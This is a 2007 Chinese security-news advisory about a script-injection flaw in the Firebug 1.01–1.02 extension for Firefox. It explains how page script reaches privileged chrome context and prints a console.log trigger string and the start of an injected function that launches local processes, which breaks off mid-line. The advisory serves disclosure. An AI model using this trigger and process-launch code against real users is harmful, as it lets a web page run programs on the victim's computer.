您的位置：首页 → 落伍资讯 → 安全资讯 → Firefox插件FireBug跨站脚本执行漏洞

Firefox插件FireBug跨站脚本执行漏洞

日期：2007-4-15 13:56:48 人气： 出处：落伍论坛 作者：拒绝游泳的鱼 [大中小]

受影响系统

Parakey Inc. Firebug 1.02

Parakey Inc. Firebug 1.01

不受影响系统

Parakey Inc. Firebug 1.03

描述

BUGTRAQ ID: 23315

FireBug是一个非常实用的JavaScript以及DOM查看调试工具，是Firefox的一个插件。FireBug的对脚本代码的处理实现上存在漏洞，远程攻击者可能利用此漏洞在用户机器上执行恶意脚本代码。

在浏览器中远程脚本是受到沙盒限制的，也就是任何http:或https:前缀的URL都是安全的。浏览器扩展使用chrome: protocol，这个协议不受任何限制，因此浏览器扩展都是受信任的。如果远程脚本诱骗浏览器对chrome:执行JavaScript表达式的话，这个脚本就可以完全控制整个chrome及操作系统，因为命令执行和读写访问都是允许的。

如果要导致Firebug执行跨站脚本，可执行以下操作：

console.log({’ ’:’exploit’})

如果将这段JavaScript表达式嵌入到页面并使用安装了Firebug的浏览器打开，用户就会得到一个警告窗，这时攻击者可以向浏览器chrome中注入以下函数：

function runFile(f) { var file = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile); file.initWithPath(f); var process = Components.classes["@mozilla.org/process/util;1"] .createInstance(Components.interfaces.nsIProcess); process.init(file); var argv = Array.prototype.slice.call(arguments, 1); process.run

上一篇：Vista又现严重漏洞提醒用户应采取防范

下一篇：首个感染iPod的病毒被发现未构成威胁

热点文章